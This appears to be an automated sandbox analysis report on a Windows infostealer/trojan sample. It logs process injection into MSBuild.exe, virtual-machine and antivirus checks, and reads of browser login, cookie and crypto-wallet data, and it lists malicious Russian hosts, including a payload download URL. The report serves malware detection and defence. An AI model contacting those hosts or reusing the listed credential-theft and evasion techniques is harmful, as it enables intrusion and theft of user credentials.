                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598859s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598750s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598520s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598279s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -598047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597718s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597604s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597442s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597199s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -597092s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596980s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596857s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4816Thread sleep time: -596375s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe TID: 2792Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6532Thread sleep time: -65000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEECF58 FindFirstFileExW,0_2_6CEECF58
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4BB6C8 FindFirstFileExW,5_2_6C4BB6C8
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: MSBuild.exe, 00000003.00000002.2354332386.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: MSBuild.exe, 00000007.00000002.3300837372.0000000005AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: Zqfxk.tmpdb.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE890A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CEE890A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE8431 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CEE8431
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE890A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CEE890A
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4B707A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C4B707A
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4BB017 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C4BB017
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4B6BA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6C4B6BA1
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 4D2000Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 4D8000Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A09008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44C000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E4A008Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe "C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE8AC8 cpuid 0_2_6CEE8AC8
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeQueries volume information: C:\Users\user\Desktop\x7myVfh5YS.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE8553 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CEE8553
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum4O$
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum4O$
                  Source: MSBuild.exe, 00000003.00000002.2350388575.00000000053F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\VERSION.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\VERSION.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\VERSION.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4256, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match, File source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts41
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Credentials in Registry
                  2
                  File and Directory Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                  Obfuscated Files or Information
                  Security Account Manager45
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                  Software Packing
                  NTDS241
                  Security Software Discovery
                  Distributed Component Object Model1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets1
                  Process Discovery
                  SSH1
                  Clipboard Data
                  3
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials51
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
                  Virtualization/Sandbox Evasion
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                  Process Injection
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  [Behavior graph] Behavior Graph ID: 1487768, Sample: x7myVfh5YS.exe, Startdate: 05/08/2024, Architecture: WINDOWS, Score: 100

                  Source | Detection | Scanner | Label
                  x7myVfh5YS.exe | 28% | Virustotal |
                  x7myVfh5YS.exe | 29% | ReversingLabs |
                  x7myVfh5YS.exe | 100% | Joe Sandbox ML |

                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Roaming\d3d9.dll | 100% | Avira | HEUR/AGEN.1300671
                  C:\Users\user\AppData\Roaming\d3d9.dll | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe | 24% | ReversingLabs | Win32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe | 42% | Virustotal |
                  C:\Users\user\AppData\Roaming\d3d9.dll | 47% | ReversingLabs | Win32.Trojan.Midie
                  C:\Users\user\AppData\Roaming\d3d9.dll | 61% | Virustotal |

                  No Antivirus matches

                  Source | Detection | Scanner | Label
                  bg.microsoft.map.fastly.net | 0% | Virustotal |
                  fermazapoved.ru | 0% | Virustotal |
                  fp2e7a.wpc.phicdn.net | 0% | Virustotal |
                  35.37.15.0.in-addr.arpa | 0% | Virustotal |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
                  access.samp-global.com | 91.217.76.162 | true | false | | unknown
                  fermazapoved.ru | 62.173.145.78 | true | true | | unknown
                  fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
                  35.37.15.0.in-addr.arpa | unknown | unknown | false | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  http://fermazapoved.ru/images/h.exe | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
                  https://fermazapoved.ru/images/h.exe | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    91.217.76.162 | access.samp-global.com | Russian Federation | 200740 | FIRST-SERVER-EU-ASRU | false
                    188.130.138.23 | unknown | Russian Federation | 204490 | ASKONTELRU | false
                    62.173.145.78 | fermazapoved.ru | Russian Federation | 34300 | SPACENET-ASInternetServiceProviderRU | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1487768
                    Start date and time:2024-08-05 05:53:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 49s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:x7myVfh5YS.exe
                    renamed because original name is a hash value
                    Original Sample Name:1de4c3cc42232c1e3d7c09404f57b450.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/24@3/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 86%
                    • Number of executed functions: 387
                    • Number of non-executed functions: 24
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.165.165.26, 199.232.214.172, 192.229.221.95, 52.165.164.15, 20.166.126.56
                    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    Time | Type | Description
                    23:54:15 | API Interceptor | 111x Sleep call for process: MSBuild.exe modified
                        w2wnAQTd6O.elfGet hashmaliciousUnknownBrowse
                        • 176.120.80.97
                        SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, VidarBrowse
                        • 176.120.64.84
                        fScyyFcjWw.elfGet hashmaliciousUnknownBrowse
                        • 176.120.64.15
                        6uPZGWXA2x.elfGet hashmaliciousMiraiBrowse
                        • 176.120.64.15
                        ASKONTELRUusdt flash sender 2.exeGet hashmaliciousRedLineBrowse
                        • 109.248.201.180
                        https://toponline.business/exomkvGet hashmaliciousHTMLPhisherBrowse
                        • 46.8.210.233
                        https://signup.primedatecom.pro/signupGet hashmaliciousPhisherBrowse
                        • 46.8.19.194
                        IMG001.exeGet hashmaliciousXmrigBrowse
                        • 46.8.19.60
                        https://drive.google.com/file/d/1e7FGpRopAR3P7JYJwPPalZPEg_iK8VLOGet hashmaliciousUnknownBrowse
                        • 188.130.138.176
                        YTeU5j9j5i.elfGet hashmaliciousUnknownBrowse
                        • 46.8.19.29
                        client.exeGet hashmaliciousUrsnifBrowse
                        • 46.8.210.250
                        client.exeGet hashmaliciousUrsnifBrowse
                        • 46.8.210.250
                        client.exeGet hashmaliciousUrsnifBrowse
                        • 46.8.210.250
                        client.exeGet hashmaliciousUrsnifBrowse
                        • 46.8.210.250
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0erundll32.exeGet hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        http://kinganik6263.github.io/Login-page/Get hashmaliciousHTMLPhisherBrowse
                        • 62.173.145.78
                        https://pub-e9e611a560554869ac6fd846941f56dc.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 62.173.145.78
